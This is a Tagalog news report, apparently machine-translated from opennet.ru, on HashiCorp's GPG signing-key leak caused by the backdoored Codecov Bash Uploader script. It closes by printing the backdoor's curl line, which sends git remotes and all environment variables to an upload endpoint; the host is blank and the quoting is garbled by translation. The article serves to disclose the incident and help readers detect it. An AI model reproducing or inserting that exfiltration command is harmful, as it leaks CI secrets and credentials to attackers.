Ang HashiCorp, na kilala sa pagbuo ng mga open source na tool na Vagrant, Packer, Nomad at Terraform, ay inihayag ang pagtagas ng pribadong GPG key na ginamit upang lumikha ng mga digital na lagda na nagbe-verify ng mga release. Ang mga attacker na nakakuha ng access sa GPG key ay posibleng gumawa ng mga nakatagong pagbabago sa mga produkto ng HashiCorp sa pamamagitan ng pag-verify sa kanila gamit ang tamang digital signature. Kasabay nito, sinabi ng kumpanya na sa panahon ng pag-audit, walang mga bakas ng mga pagtatangka na gumawa ng gayong mga pagbabago ang natukoy.
Sa kasalukuyan, ang nakompromisong GPG key ay binawi at isang bagong key ang ipinakilala sa lugar nito. Naapektuhan lang ng problema ang pag-verify gamit ang mga file na SHA256SUM at SHA256SUM.sig, at hindi naapektuhan ang pagbuo ng mga digital na lagda para sa Linux DEB at RPM packages na ibinibigay sa pamamagitan ng releases.hashicorp.com, pati na rin ang mga mekanismo ng pag-verify ng release para sa macOS at Windows (AuthentiCode) .
Naganap ang pagtagas dahil sa paggamit ng Codecov Bash Uploader (codecov-bash) script sa imprastraktura, na idinisenyo upang mag-download ng mga ulat sa saklaw mula sa tuluy-tuloy na mga sistema ng pagsasama. Sa panahon ng pag-atake sa kumpanya ng Codecov, isang backdoor ang nakatago sa tinukoy na script, kung saan ipinadala ang mga password at encryption key sa server ng mga umaatake.
Upang i-hack, sinamantala ng mga umaatake ang isang error sa proseso ng paggawa ng imahe ng Codecov Docker, na nagbigay-daan sa kanila na kumuha ng data ng access sa GCS (Google Cloud Storage), na kinakailangan upang gumawa ng mga pagbabago sa script ng Bash Uploader na ipinamahagi mula sa codecov.io website. Ang mga pagbabago ay ginawa noong Enero 31, nanatiling hindi natukoy sa loob ng dalawang buwan at pinahintulutan ang mga umaatake na kunin ang impormasyong nakaimbak sa mga environment ng system ng tuluy-tuloy na pagsasama ng customer. Gamit ang idinagdag na malisyosong code, maaaring makakuha ang mga attacker ng impormasyon tungkol sa nasubok na Git repository at lahat ng environment variable, kabilang ang mga token, encryption key at password na ipinadala sa tuluy-tuloy na integration system upang ayusin ang access sa application code, mga repositoryo at serbisyo gaya ng Amazon Web Services at GitHub.
Bilang karagdagan sa direktang tawag, ginamit ang script ng Codecov Bash Uploader bilang bahagi ng iba pang mga uploader, gaya ng Codecov-action (Github), Codecov-circleci-orb at Codecov-bitrise-step, na ang mga user ay apektado rin ng problema. Ang lahat ng mga gumagamit ng codecov-bash at mga kaugnay na produkto ay inirerekomenda na i-audit ang kanilang mga imprastraktura, pati na rin baguhin ang mga password at encryption key. Maaari mong suriin ang pagkakaroon ng backdoor sa isang script sa pamamagitan ng pagkakaroon ng line curl -sm 0.5 -d β$(git remote -v)<<<<<< ENV $(env)β http:// /upload/v2 || totoo
Pinagmulan: opennet.ru